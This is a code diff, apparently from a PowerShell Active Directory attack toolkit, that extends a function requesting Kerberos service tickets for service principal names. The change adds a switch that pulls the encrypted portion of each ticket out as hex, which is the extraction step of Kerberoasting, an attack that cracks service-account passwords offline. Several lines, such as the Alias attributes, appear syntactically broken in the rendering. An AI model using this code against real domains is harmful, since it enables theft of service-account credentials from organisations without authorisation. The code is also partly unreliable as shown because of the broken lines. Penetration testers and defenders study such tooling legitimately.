@@ -1321,12 +1321,22 @@ function Request-SPNTicket {
13211321 . PARAMETER SPN
13221322
13231323 The service principal name to request the ticket for. Required.
1324+
1325+ . PARAMETER EncPart
1326+
1327+ Switch. Return the encrypted portion of the ticket (cipher).
13241328
13251329 . EXAMPLE
13261330
13271331 PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local"
13281332
13291333 Request a kerberos service ticket for the specified SPN.
1334+
1335+ . EXAMPLE
1336+
1337+ PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart
1338+
1339+ Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket.
13301340
13311341 . EXAMPLE
13321342
@@ -1346,7 +1356,11 @@ function Request-SPNTicket {
13461356 [Parameter (Mandatory = $True , ValueFromPipelineByPropertyName = $True )]
13471357 [Alias (' ServicePrincipalName'
13481358 [String []]
1349- $SPN
1359+ $SPN ,
1360+
1361+ [Alias (' EncryptedPart'
1362+ [Switch ]
1363+ $EncPart
13501364 )
13511365
13521366 begin {
@@ -1356,7 +1370,20 @@ function Request-SPNTicket {
13561370 process {
13571371 ForEach ($UserSPN in $SPN ) {
13581372 Write-Verbose " Requesting ticket for: $UserSPN "
1359- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1373+ if (! $EncPart ) {
1374+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1375+ }
1376+ else {
1377+ $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList $UserSPN
1378+ $TicketByteStream = $Ticket.GetRequest ()
1379+ if ($TicketByteStream )
1380+ {
1381+ $TicketHexStream = [System.BitConverter ]::ToString($TicketByteStream ) -replace " -"
1382+ [System.Collections.ArrayList ]$Parts = ($TicketHexStream -replace ' ^(.*?)04820...(.*)' , ' $2' -Split " A48201"
1383+ $Parts.RemoveAt ($Parts.Count - 1 )
1384+ $Parts -join " A48201"
1385+ }
1386+ }
13601387 }
13611388 }
13621389}
0 commit comments